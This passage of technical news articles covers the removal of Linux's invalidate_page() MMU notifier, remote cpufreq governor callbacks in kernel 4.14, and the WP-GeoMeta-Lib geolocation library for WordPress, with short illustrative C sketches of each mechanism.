The problem came down to a difference between the invalidate_page() and invalidate_range() callbacks: the former is allowed to sleep, while the latter cannot. The offending commit was trying to fix a problem where invalidate_page() was called with a spinlock held — a context where sleeping is not allowed — by calling invalidate_range() instead. But, as Arcangeli pointed out, that will not lead to joy, since not all users implement invalidate_range() ; it is necessary to call invalidate_range_start() and invalidate_range_end() instead.

The real fix turned out to not be quite so simple, though. Among other things, the fact that invalidate_page() can sleep makes it fundamentally racy. It cannot be called while the page-table spinlock affecting the page to be invalidated is held, meaning that the page-table entry can change before or during the call. This sort of issue is why Torvalds complained about the MMU notifiers in general and stated that they simply should not be able to sleep at all. But, as Jérôme Glisse pointed out, some use cases absolutely require the ability to sleep:

There is no way around sleeping if we ever want to support thing like GPU. To invalidate page table on GPU you need to schedule commands to do so on GPU command queue and wait for the GPU to signal that it has invalidated its page table/tlb and caches. We had this discussion before. Either we want to support all the new fancy GPGPU, AI and all the API they rely on or we should tell them sorry guys not on linux.

Torvalds later backed down a little, making a distinction between two cases. Anything dealing with virtual addresses and the mm_struct structure can sleep, while anything dealing with specific pages and page-table entries cannot. Thus, the invalidate_range_start() and invalidate_range_end() callbacks, which deal with ranges of addresses and are called without any spinlocks held, can sleep. But invalidate_range() and invalidate_page() cannot.

That, in turn, suggests that invalidate_page() is fundamentally wrong by design. After some discussion, Torvalds concluded that the best thing to do would be to remove it entirely. But, as the bug that started the discussion showed, replacing it with invalidate_range() calls is not a complete solution to the problem. To make things work again in all settings, including those that need to be able to sleep, the invalidate_range() calls must always be surrounded by calls to invalidate_range_start() and invalidate_range_end() .
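The resulting calling convention can be sketched as follows. This is a user-space illustration under stated assumptions, not the code that was merged: the toy_notifier types, the recording callbacks, and toy_unmap_range() are hypothetical names. It shows the two points made above: the non-sleeping invalidate_range() call sits between the two calls that may sleep, and a user that does not implement invalidate_range() still sees the start/end pair.

```c
#include <assert.h>
#include <stddef.h>

struct toy_notifier;

/* Hypothetical, cut-down callback table; any entry may be NULL. */
struct toy_notifier_ops {
    void (*invalidate_range_start)(struct toy_notifier *n,
                                   unsigned long start, unsigned long end);
    void (*invalidate_range)(struct toy_notifier *n,
                             unsigned long start, unsigned long end);
    void (*invalidate_range_end)(struct toy_notifier *n,
                                 unsigned long start, unsigned long end);
};

struct toy_notifier {
    const struct toy_notifier_ops *ops;
    char   trace[8];   /* which callbacks ran, in order */
    size_t len;
};

static void trace_add(struct toy_notifier *n, char c)
{
    if (n->len + 1 < sizeof(n->trace)) {
        n->trace[n->len++] = c;
        n->trace[n->len] = '\0';
    }
}

/* Recording callbacks standing in for a real secondary-MMU user. */
void rec_start(struct toy_notifier *n, unsigned long s, unsigned long e)
{ (void)s; (void)e; trace_add(n, 'S'); }
void rec_range(struct toy_notifier *n, unsigned long s, unsigned long e)
{ (void)s; (void)e; trace_add(n, 'R'); }
void rec_end(struct toy_notifier *n, unsigned long s, unsigned long e)
{ (void)s; (void)e; trace_add(n, 'E'); }

/* One user implements all three callbacks, the other only start/end. */
const struct toy_notifier_ops full_ops = {
    .invalidate_range_start = rec_start,
    .invalidate_range       = rec_range,
    .invalidate_range_end   = rec_end,
};
const struct toy_notifier_ops start_end_ops = {
    .invalidate_range_start = rec_start,
    .invalidate_range_end   = rec_end,
};

void toy_unmap_range(struct toy_notifier *n,
                     unsigned long start, unsigned long end)
{
    assert(n && n->ops);
    if (n->ops->invalidate_range_start)      /* no spinlock held: may sleep */
        n->ops->invalidate_range_start(n, start, end);
    /* the page-table lock would be taken and entries cleared here */
    if (n->ops->invalidate_range)            /* lock held: must not sleep */
        n->ops->invalidate_range(n, start, end);
    /* the page-table lock would be dropped here */
    if (n->ops->invalidate_range_end)        /* may sleep again */
        n->ops->invalidate_range_end(n, start, end);
}
```

Running toy_unmap_range() against a notifier using full_ops records the sequence S, R, E; with start_end_ops it records S, E, so a user that needs to sleep is never left out.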

Glisse quickly implemented that idea and, after a round of review, his patch set was fast-tracked into the 4.13 kernel three days before its release. So, as a last-minute surprise, the invalidate_page() MMU notifier is gone; out-of-tree modules that used it will not work with 4.13 until they are updated. It is rare to see a change of this nature merged so late in the development cycle, but the alternative was to release with real regressions and the confidence in the fix was high. With luck, this fix will prevent similar problems from occurring in the future.

There is still one problem related to MMU notifiers in the 4.13 kernel, though: it turns out that the out-of-memory reaper, which tries to recover memory more quickly from processes that have been killed in an out-of-memory situation, does not invoke the notifiers. That, in turn, can lead to corruption on systems where notifiers are in use and memory runs out. Michal Hocko has responded with a patch to disable the reaper on processes that have MMU notifiers registered. He took that approach because the notifier implementations are out of the memory-management subsystem's control, and he worried about what could happen in an out-of-memory situation, where the system is already in a difficult state. This patch has not been merged as of this writing, but something like it will likely get in soon and find its way into the stable trees.

Notifier callbacks have a bit of a bad name in the kernel community. Kernel developers like to know exactly what will happen in response to a given action, and notifiers tend to obscure that information. As can be seen in the original bug and the reaper case, notifiers may also not be called consistently throughout a subsystem. But they can be hard to do without, especially as the complexity of the system grows. Sometimes the best that can be done is to be sure that the semantics of the notifiers are clear from the outset, and to be willing to make fundamental changes when the need becomes clear — even if that happens right before a release.


The kernel's CPU-frequency ("cpufreq") governors are charged with picking an operating frequency for each processor that minimizes power use while maintaining an adequate level of performance as determined by the current policy. These governors normally run locally, with each CPU handling its own frequency management. The 4.14 kernel release, though, will enable the CPU-frequency governors to control the frequency of any CPU in the system if the architecture permits, a change that should improve the performance of the system overall.

For a long time, the cpufreq governors used the kernel's timer infrastructure to run at a regular interval and sample CPU utilization. That approach had its shortcomings; the biggest one was that the cpufreq governors were running in a reactive mode, choosing the next frequency based on the load pattern in the previous sampling period. There is, of course, no guarantee that the same load pattern will continue after the frequency is changed. Additionally, there was no coordination between the cpufreq governors and the task scheduler. It would be far better if the cpufreq governors were proactive and, working with the scheduler, could choose a frequency that suits the load that the system is going to have in the next sampling period.

In the 4.6 development cycle, Rafael Wysocki removed the dependency on kernel timers and placed hooks within the scheduler itself. The scheduler calls these hooks for certain events, such as attaching a task to a run queue or when the load created by the processes in the run queue changes. The hooks are implemented by the individual cpufreq governors. Those governors register and unregister their CPU-utilization update callbacks with the scheduler using the following interfaces:

    void cpufreq_add_update_util_hook(int cpu, struct update_util_data *data,
                    void (*func)(struct update_util_data *data, u64 time,
                                 unsigned int flags));
    void cpufreq_remove_update_util_hook(int cpu);

Where struct update_util_data is defined as:

    struct update_util_data {
        void (*func)(struct update_util_data *data, u64 time,
                     unsigned int flags);
    };

The scheduler internally keeps per-CPU pointers to the struct update_util_data that is passed to the cpufreq_add_update_util_hook() routine. Only one callback can be registered per CPU. The scheduler starts calling the cpufreq_update_util_data->func() callback from the next event that happens after the callback is registered.
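The registration scheme just described can be modeled in user space. This is a rough sketch, not the kernel implementation: the toy_ function names, the four-CPU limit, the toy_governor structure, and the integer return value (used here to signal a busy slot) are assumptions for illustration only. The governor embeds struct update_util_data as its first member so that the callback can recover its own state from the pointer it is handed; the kernel uses container_of() for the same purpose.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_NR_CPUS 4

struct update_util_data {
    void (*func)(struct update_util_data *data, uint64_t time,
                 unsigned int flags);
};

/* One pointer per CPU, standing in for the scheduler's per-CPU variable. */
static struct update_util_data *toy_hooks[TOY_NR_CPUS];

/* Returns 0 on success, -1 on bad arguments or if the CPU already has a
 * callback (only one may be registered per CPU). */
int toy_add_update_util_hook(int cpu, struct update_util_data *data,
                             void (*func)(struct update_util_data *data,
                                          uint64_t time, unsigned int flags))
{
    if (cpu < 0 || cpu >= TOY_NR_CPUS || !data || !func || toy_hooks[cpu])
        return -1;
    data->func = func;
    toy_hooks[cpu] = data;
    return 0;
}

void toy_remove_update_util_hook(int cpu)
{
    if (cpu >= 0 && cpu < TOY_NR_CPUS)
        toy_hooks[cpu] = NULL;
}

/* What the scheduler side does when utilization changes on a CPU. */
void toy_update_util(int cpu, uint64_t time, unsigned int flags)
{
    struct update_util_data *data;

    if (cpu < 0 || cpu >= TOY_NR_CPUS)
        return;
    data = toy_hooks[cpu];
    if (data)
        data->func(data, time, flags);
}

/* Hypothetical governor state with the hook data as its first member. */
struct toy_governor {
    struct update_util_data update_util;
    uint64_t     last_time;
    unsigned int calls;
};

void toy_governor_update(struct update_util_data *data, uint64_t time,
                         unsigned int flags)
{
    /* Valid because update_util is the first member of toy_governor. */
    struct toy_governor *g = (struct toy_governor *)data;

    (void)flags;
    g->last_time = time;
    g->calls++;
}
```

Events delivered before registration or after removal are simply dropped, which matches the statement that callbacks begin with the next event after registration.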

The legacy governors (ondemand and conservative) are still considered to be reactive, as they continue to rely on the data available from the last sampling period to compute the next frequency to run. Specifically, they calculate CPU load based on how much time a CPU was idle in the last sampling period. However, the schedutil governor is considered to be proactive, since it calculates the next frequency based on the average utilization of the CPU's current run queue. The schedutil governor will pick the maximum frequency for a CPU if any realtime or deadline tasks are available to run.
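The difference between the two approaches can be made concrete with a small sketch. The function names below are hypothetical and the calculations are simplified. In particular, the 25% headroom added to the utilization-based frequency reflects the mainline schedutil code as understood at the time of writing rather than anything stated in this article, and the real governor's choice of reference frequency is more involved.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Reactive style: percentage load over the last sampling period,
 * derived from how long the CPU sat idle during that period. */
unsigned int toy_load_from_idle(uint64_t wall_us, uint64_t idle_us)
{
    if (wall_us == 0 || idle_us >= wall_us)
        return 0;
    return (unsigned int)(100 * (wall_us - idle_us) / wall_us);
}

/* Proactive style: scale the maximum frequency by the run queue's
 * average utilization (util out of max), with 25% headroom, clamped to
 * the maximum. Realtime or deadline work gets the maximum outright. */
unsigned int toy_next_freq(unsigned int max_freq_khz, unsigned long util,
                           unsigned long max, bool rt_or_dl_runnable)
{
    uint64_t freq;

    if (rt_or_dl_runnable || max == 0)
        return max_freq_khz;
    freq = (uint64_t)max_freq_khz + (max_freq_khz >> 2);
    freq = freq * util / max;
    return freq > max_freq_khz ? max_freq_khz : (unsigned int)freq;
}
```

With a 2GHz maximum and a run queue at half utilization (512 out of 1024), toy_next_freq() asks for 1.25GHz; the same call with a realtime task runnable returns the full 2GHz regardless of utilization.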

Remote callbacks

In current kernels, the scheduler will call these utilization-update hooks only if the target run queue, the queue for the CPU whose utilization has changed, is the run queue of the local CPU. While this works well for most scheduler events, it doesn't work that well for some. This mostly affects performance of only the schedutil cpufreq governor, since the others don't take the average utilization into consideration when calculating the next frequency.

With certain types of systems, such as Android, the latency of cpufreq response to certain scheduling events can be critical. Because the cpufreq callbacks are not currently called from remote CPUs, there are situations where a target CPU may not run the cpufreq governor for some time.

For example, consider a system where a task is running on a given CPU, and a second task is queued to run on that CPU by a different CPU. If the newly enqueued task has a high CPU demand, the target CPU should increase its frequency immediately (based on the utilization average of its run queue) to meet that demand. But, because of the above-mentioned limitation, this does not occur as the task was enqueued by a remote CPU. The schedutil cpufreq governor's utilization update hook will be called only on the next scheduler event, which may happen only after some microseconds have passed. That is bad for performance-critical tasks like the Android user interface. Most Android devices refresh the screen at 60 frames per second; that is 16ms per frame. The screen rendering has to finish within these 16ms to avoid jerky motion. If 4ms are taken by the cpufreq governor to update the frequency, then the user's experience isn't going to be nice.

This problem can be avoided by invoking the governor to change the target CPU's frequency immediately after queuing the new task, but that may not always be possible or practical; the processor architecture may not allow it. For example, the x86 architecture updates CPU frequencies by writing to local, per-CPU registers, which remote CPUs cannot do. Sending an inter-processor interrupt to the target CPU to update its frequency sounds like overkill and will add unnecessary noise for the scheduler. Using interrupts could add just the sort of latency that this work seeks to avoid.

On the other hand, updating CPU frequencies on the ARM architecture is normally CPU-independent; any CPU can change the frequency of any other CPU. Thus, the patch set enabling remote callbacks took the middle approach and avoided sending inter-processor interrupts to the target CPU. The patch set is queued in the power-management tree for the 4.14-rc1 kernel release. The frequency of a CPU can now be changed remotely by a CPU that shares cpufreq policy with the target CPU; that is, both the CPUs share their clock and voltage rails and switch performance state together. But CPU-frequency changes can also be made from any other CPU on the system if the cpufreq policy of the target CPU has the policy->dvfs_possible_from_any_cpu field set to true. This is a new field and must be set by the cpufreq driver from its cpufreq_driver->init() callback if it allows changing frequencies from CPUs running a different cpufreq policy. The generic device-tree based cpufreq driver is already updated to enable remote changes.
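The rule for when a remote update is allowed can be sketched as a simple predicate. This is a user-space model under stated assumptions: the toy_policy structure and the function name are hypothetical, a bitmask stands in for the kernel's CPU mask, and only the dvfs_possible_from_any_cpu field name is taken from the text above.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-in for a cpufreq policy. */
struct toy_policy {
    unsigned long cpus;                 /* bit N set: CPU N shares this policy */
    bool dvfs_possible_from_any_cpu;    /* set by the driver at init time */
};

/* May this_cpu change the frequency of the CPUs covered by policy? */
bool toy_can_do_remote_dvfs(const struct toy_policy *policy,
                            unsigned int this_cpu)
{
    bool shares_policy = this_cpu < 8 * sizeof(policy->cpus) &&
                         ((policy->cpus >> this_cpu) & 1UL);

    return shares_policy || policy->dvfs_possible_from_any_cpu;
}
```

On an imagined eight-CPU system where CPUs 0-3 share one policy (mask 0x0f), CPU 2 may always update that policy, while CPU 5 may do so only if the driver has set dvfs_possible_from_any_cpu.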

Remote cpufreq callbacks will be enabled (by default) in the 4.14 kernel release; they should improve the performance of the schedutil governor in a number of scenarios. Other architectures may want to consider updating their cpufreq drivers to set the policy->dvfs_possible_from_any_cpu field to true if they can support cross-CPU frequency changes.


As much as we get addicted to mobile phones and online services, nobody (outside of cyberpunk fiction) actually lives online. That's why maps, geolocation services, and geographic information systems (GISes) have come to play a bigger role online. They reflect the way we live, work, travel, socialize, and (in the case of natural or human-made disasters, which come more and more frequently) suffer. Thus there is value in integrating geolocation into existing web sites, but systems like WordPress do not make supporting that easy. The software development firm LuminFire has contributed to the spread of geolocation services by creating a library for WordPress that helps web sites insert geolocation information into web pages. This article describes how LuminFire surmounted the challenges posed by WordPress and shows a few uses for the library.

LuminFire developer Michael Moore presented the library, called WP-GeoMeta-Lib, at a talk (the slides are available in Moore's blog posting) on August 16 at FOSS4G, the major open-source geolocation conference. FOSS4G's success itself demonstrates the growing importance of geolocation, as well as the thriving free-software communities that create solutions for it through group projects such as the Open Source Geospatial Foundation (OSGeo). FOSS4G held its first conference in 2004 in Thailand. Its global wanderings, which would require sophisticated geolocation tools to track, brought it this year to Boston, where it topped 1,100 registered attendees, its biggest turnout yet.

With so many GIS projects aimed at the web, such as the popular Leaflet JavaScript library, why try to do geolocation through WordPress? LuminFire developed its library to satisfy requests from its clients, but Moore threw us some statistics to show how important the project would be to the larger public. One estimate claims that 28% of the world's web sites use WordPress. Thus, a good GIS service for WordPress can vastly increase the availability of geographic information.

So what are the problems? The data you store for web pages, including geospatial data, is called metadata by WordPress. It stores this data as plain text. The existing GIS plugins have to manipulate geospatial information as text, or convert it back and forth between text and a native format, which is all cumbersome and slow. Furthermore, WordPress uses MySQL for its storage. I believe this bolsters the popularity of WordPress, because MySQL is easy to use and adequate for typical web needs. But it has a limited geospatial model. Although both MySQL and its fork, MariaDB, have made strides adding spatial support, their spatial analysis capabilities are paltry compared to PostgreSQL. The PostgreSQL geospatial extension, PostGIS, is an anchor of the free-software GIS movement, and could be found all over the FOSS4G conference.

Discussions at WordPress about supporting other databases serve mostly to show how daunting a port to PostgreSQL would be. Although MySQL and PostgreSQL both adhere to some standards, they differ in significant ways (for instance, in how they implement the essential feature of automatically incrementing columns). A PostgreSQL plugin for WordPress was created, but it never worked well and is now outdated to the point of being unusable. So WordPress administrators don't really have the option of using PostgreSQL or PostGIS.

Moore mentioned one example of the problems with MySQL: up through version 5.5, it determined whether geometric objects overlapped by checking each one's bounding box (the smallest rectangle that can contain the object). For instance, two circular objects that are close together may be considered overlapping even if just their bounding boxes overlap. This is inadequate for geolocation, which requires more precise processing. MySQL improved the code for version 5.6, but the majority of sites still run version 5.5 or earlier.
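The gap between the two tests is easy to demonstrate. The sketch below is an illustration in plain C with hypothetical names, not MySQL code: it compares a bounding-box overlap test with an exact test for two circles, using flat Cartesian coordinates.

```c
#include <assert.h>
#include <stdbool.h>

struct circle {
    double x, y;   /* center */
    double r;      /* radius */
};

/* Coarse test: do the smallest axis-aligned rectangles containing
 * the two circles overlap? */
bool bbox_overlap(struct circle a, struct circle b)
{
    return a.x - a.r <= b.x + b.r && b.x - b.r <= a.x + a.r &&
           a.y - a.r <= b.y + b.r && b.y - b.r <= a.y + a.r;
}

/* Exact test: the circles overlap when the distance between centers is
 * at most the sum of the radii (compared squared, avoiding a sqrt). */
bool circles_overlap(struct circle a, struct circle b)
{
    double dx = a.x - b.x, dy = a.y - b.y, rsum = a.r + b.r;

    return dx * dx + dy * dy <= rsum * rsum;
}
```

Two unit circles centered at (0, 0) and (1.5, 1.5) have overlapping bounding boxes, but their centers are about 2.12 units apart, more than the combined radius of 2, so the circles themselves do not touch. A bounding-box-only test reports a false match.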

Moore also lamented the lack of Python support in WordPress, because Python offers so many powerful geolocation tools. WordPress is based on PHP, which I believe is another reason for its popularity. PHP doesn't offer geolocation support, but it doesn't seem to get in the way of what LuminFire wants to do.

A final requirement for LuminFire's development effort concerned its users: few of them are GIS experts who can understand the software popular in the GIS community. LuminFire wanted a tool that ordinary WordPress administrators could use. Given these limitations, LuminFire chose to develop a library for WordPress instead of a plugin. This WP-GeoMeta-Lib library, distributed under GPLv2, uses the WordPress API.

Working with a system that doesn't understand your data

In an email exchange after the conference, Moore gave me an in-depth explanation of the techniques used by WP-GeoMeta-Lib to turn the limited support by WordPress and MySQL into a platform for efficient and accurate location data. Here, we provide some background for people who want to understand WordPress's system of hooks and storage; it may also be of general interest because it illuminates how developers can deal with the tradeoffs posed by the platforms they work with.

At the center of WP-GeoMeta-Lib is a set of tables in the MySQL database that parallel the four WordPress tables holding metadata. WP-GeoMeta-Lib creates the parallel tables to store geospatial data. Instead of the MySQL data type used by WordPress for its metadata (LONGTEXT), WP-GeoMeta-Lib uses the GEOMETRYCOLLECTION data type, the most appropriate type in MySQL to store geospatial information. To carry out basic geographical inquiries, such as whether a location is within a larger region or what the distance is between two locations, you need subclasses of MySQL's GEOMETRY type. Using LONGTEXT for that purpose would be like trying to perform calculus using Roman numerals. GEOMETRYCOLLECTION is a good general-purpose type that recognizes points, lines, boundaries, and other concepts that are basic to geography. The generality of GEOMETRYCOLLECTION makes it useful for storing the arbitrary mix of geometric elements that different applications require.

WP-GeoMeta-Lib uses the WordPress hook system to intercept calls to the WordPress API and substitute a geospatial database for the WordPress metadata tables. Let's say a developer retrieves data from the MySQL database using the WP_Query object. (In theory, the developer could bypass WordPress and run raw SQL, but WordPress discourages this.) The function that handles WP_Query calls an internal WordPress function named get_meta_sql() on every query, so WP-GeoMeta-Lib registers its hook for that function. Every time get_meta_sql() runs on that WordPress site, it calls all the functions that the site developer passes to the hook. When the developer's functions finish, the function behind WP_Query picks up and continues as if nothing had intervened.

WP-GeoMeta-Lib uses hooks into the four types of metadata—posts, users, terms, and comments—that are part of the filters in the Plugin API. Plugins can add metadata to WordPress, delete metadata, update it, and retrieve it. By hooking into these low-level functions, WP-GeoMeta-Lib is guaranteed to have a whack at anything that affects WordPress metadata. And this metadata is where it's most convenient for the user to store structured data, such as geolocation data, in WordPress, so WP-GeoMeta-Lib works in a way familiar to WordPress developers.

The WP-GeoMeta-Lib hooks check the WordPress call for references to the more than a hundred spatial functions supported by MySQL. If it finds a spatial function, WP-GeoMeta-Lib changes the SQL to find the data of interest in its own geospatial metadata instead of the general-purpose WordPress metadata. The library also alters that fragment of SQL to run the requested spatial function. After updating the SQL query, the library returns from the hook so WordPress can do its usual stuff with all the elements of the API call.

Thus, WordPress doesn't have to know what WP-GeoMeta-Lib is doing. WordPress goes ahead and stores its own version of the geospatial element in the LONGTEXT fields. It would be hard to tell WordPress to alter its usual behavior, so WP-GeoMeta-Lib does not try to suppress the LONGTEXT elements. It just ensures that its own metadata is used for geospatial elements—the LONGTEXT metadata is basically inert.

Part of Moore's design for WP-GeoMeta-Lib is based on a humble assumption that something might go wrong during its run, and he wanted to minimize the chance that it would interfere with the function that calls it, or other functions that website developers might pass to hooks. Therefore, he chose to hook in his functions at the latest possible point.
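The combination of SQL rewriting and late hooking can be modeled with a small filter chain. WordPress and WP-GeoMeta-Lib are written in PHP, so the C sketch below only illustrates the mechanism; every name in it is hypothetical, including the wp_postmeta_geo table name, the "ST_" prefix test used to spot a spatial function, and the priority of 9999. The one detail borrowed from WordPress itself is that filters with lower priority numbers run first and that the default priority is 10.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define TOY_MAX_FILTERS 8
#define TOY_SQL_MAX     256

typedef void (*toy_filter_fn)(char *sql, size_t cap);

struct toy_filter { toy_filter_fn fn; int priority; };
struct toy_hook   { struct toy_filter filters[TOY_MAX_FILTERS]; size_t count; };

/* Insert a filter, keeping the list sorted by ascending priority;
 * filters with equal priority keep their registration order. */
int toy_add_filter(struct toy_hook *h, toy_filter_fn fn, int priority)
{
    size_t i;

    if (!fn || h->count == TOY_MAX_FILTERS)
        return -1;
    for (i = h->count; i > 0 && h->filters[i - 1].priority > priority; i--)
        h->filters[i] = h->filters[i - 1];
    h->filters[i].fn = fn;
    h->filters[i].priority = priority;
    h->count++;
    return 0;
}

/* Run every registered filter, in priority order, over the fragment. */
void toy_apply_filters(const struct toy_hook *h, char *sql, size_t cap)
{
    for (size_t i = 0; i < h->count; i++)
        h->filters[i].fn(sql, cap);
}

/* Stand-in for some other plugin's filter; it changes nothing. */
void toy_other_filter(char *sql, size_t cap)
{
    (void)sql;
    (void)cap;
}

/* If the fragment calls a spatial function, point its first reference
 * to the ordinary metadata table at the parallel geo table instead.
 * Fragments without a spatial function are left untouched. */
void toy_geo_filter(char *sql, size_t cap)
{
    static const char from[] = "wp_postmeta.";
    static const char to[]   = "wp_postmeta_geo.";
    size_t from_len = strlen(from), to_len = strlen(to);
    char *hit = strstr(sql, from);

    if (!strstr(sql, "ST_") || !hit ||
        strlen(sql) + (to_len - from_len) + 1 > cap)
        return;
    /* Shift the tail (including its NUL) right, then drop in the new name. */
    memmove(hit + to_len, hit + from_len, strlen(hit + from_len) + 1);
    memcpy(hit, to, to_len);
}
```

Registering toy_geo_filter with a large priority number places it after toy_other_filter (priority 10) regardless of registration order, so it sees the fragment only after everything else has had its turn.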

Moore used WP-GeoMeta-Lib to develop plugins that are even easier to use than API calls for certain tasks. Two of these, Brilliant Geocoder for Gravity Forms and GeoMeta for ACF, allow WordPress sites to use popular form plugins to give end-users tools for viewing and manipulating geospatial data. They also help administrators put WP-GeoMeta-Lib to direct use, as we'll see.

Example use: searching by location

A LuminFire client in the medical services industry uses WP-GeoMeta-Lib to enable customers to search for doctors by location. Information about these doctors is stored in a directory exposed through WordPress's custom post type, which allows the developer to create new fields that WordPress hasn't provided. This particular client made the doctor's name the title of each custom post, and created a collection of custom fields to store information that patients might use to search for doctors, such as their specialties and qualifications.

Because the client used ACF Pro to store each field, the developers used the GeoMeta for ACF plugin to create a field for the doctor's location. When the medical site's staff edit listings of doctors and add or update an address, the GeoMeta for ACF plugin geocodes the address to get the coordinates of the office location. The coordinates are returned in GeoJSON format. When all the doctor information is saved by the generic ACF plugin, the GeoMeta for ACF plugin invokes WP-GeoMeta-Lib to store the coordinates in the WP-GeoMeta-Lib metadata tables.

Customers can then log into the site and view the doctor directory, which allows searches using various criteria (called a faceted search by ontologists), including the customer's address and a maximum distance. A search using these facets triggers a function that geocodes the address and runs a spatial query against the WP-GeoMeta-Lib metadata. The results are passed back to WordPress and the directory is redisplayed with only the doctors located within the maximum distance.

The resulting code is both robust and extendable. The medical company plans to add more complex searches, such as finding doctors who restrict their practices to certain regions or counties. Although the most basic distance-based search could have been carried out using custom queries and trigonometry, the more irregular searches will need the full, sophisticated spatial query capabilities.

Example use: connecting users by geographic location

A non-profit uses WP-GeoMeta-Lib as part of coordinating waterway stewardship among cities, watershed management organizations (WMOs), Watershed Districts (WDs), and volunteers. Pollution in one area of a watershed affects all downstream areas, so the WMOs and WDs are responsible for regulating and managing pollution across multiple city and county borders. This client runs several types of spatial queries, and stores location information in several places.

For instance, pollution mitigation features (such as a rain garden) are usually group projects. The volunteer who launches the initiative wants to search for other volunteers who live close by. And after the project is complete, both the city and the relevant WMO want to know about it.

When volunteers sign up, they enter their information through a form powered by the Gravity Forms plugin. That is where Moore's Brilliant Geocoder for Gravity Forms plugin comes in; the non-profit uses it to convert the volunteer's address into a location. As with the previous example, data about the projects is stored on a custom post type, and the function that stores the data uses GeoMeta for ACF to let volunteers and site editors enter project locations.

Finally, the site created a custom category collection for projects so that a project can be tagged with a WMO or WD. Each of the tags for a WMO or WD includes its boundaries as geospatial information. This could be used in the future for applications such as finding a WD that would benefit from a project, finding all volunteers living within the boundaries of a WMO's region, or checking which regions benefit from funding. In short, this data will enable spatial-based reporting and mapping, giving the non-profit the opportunity to add powerful geospatial enhancements to their site over time.
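A query such as "all volunteers within a WMO's boundaries" comes down to a point-in-polygon test, which a spatial database performs internally. The sketch below shows the classic ray-casting version of that test in C; it is an illustration only, with hypothetical names, and it treats longitude and latitude as flat x/y coordinates, a simplification that a real GIS would not make.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct point { double x, y; };   /* x: longitude, y: latitude */

/* Ray casting: shoot a ray from p toward +x and count how many polygon
 * edges it crosses; an odd count means p is inside. */
bool point_in_polygon(struct point p, const struct point *poly, size_t n)
{
    bool inside = false;

    if (n < 3)
        return false;
    for (size_t i = 0, j = n - 1; i < n; j = i++) {
        /* Does edge j->i straddle the horizontal line through p? */
        if ((poly[i].y > p.y) != (poly[j].y > p.y)) {
            double x_at = poly[j].x + (p.y - poly[j].y) *
                          (poly[i].x - poly[j].x) / (poly[i].y - poly[j].y);
            if (p.x < x_at)
                inside = !inside;
        }
    }
    return inside;
}

/* Count how many of the given locations fall inside the boundary. */
size_t count_inside(const struct point *pts, size_t npts,
                    const struct point *poly, size_t n)
{
    size_t count = 0;

    for (size_t i = 0; i < npts; i++)
        if (point_in_polygon(pts[i], poly, n))
            count++;
    return count;
}
```

For an L-shaped district with corners (0,0), (4,0), (4,2), (2,2), (2,4), and (0,4), the points (1,3) and (3,1) are inside while (3,3) is not, even though all three lie within the district's bounding box. That is the kind of irregular boundary for which a simple distance calculation is no help.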

Although mapping is a big part of GIS, Moore pointed out that neither of the cases mentioned in this article uses mapping currently. A lot of searching and reporting is also location-based and is difficult or impossible without spatial data.

Conclusion

WP-GeoMeta-Lib uses a lot of workarounds. It is clever in its use of parallel metadata, but it requires developers to build new geolocation tools on top of MySQL, somewhat reinventing the wheel when other environments use PostGIS or proprietary tools. The example uses highlighted in this article show the potential for GIS tools in a web environment; hopefully this potential will draw more developers to create them.

The basic assumptions behind WordPress would probably make it hard for WordPress to upgrade to more native support for GIS. For instance, it would have to allow arbitrary objects as metadata instead of plain text. Moore's goal of bringing geographical information to a wide audience of administrators and users is a commendable one, and WP-GeoMeta-Lib seems to have accomplished a lot toward that goal.
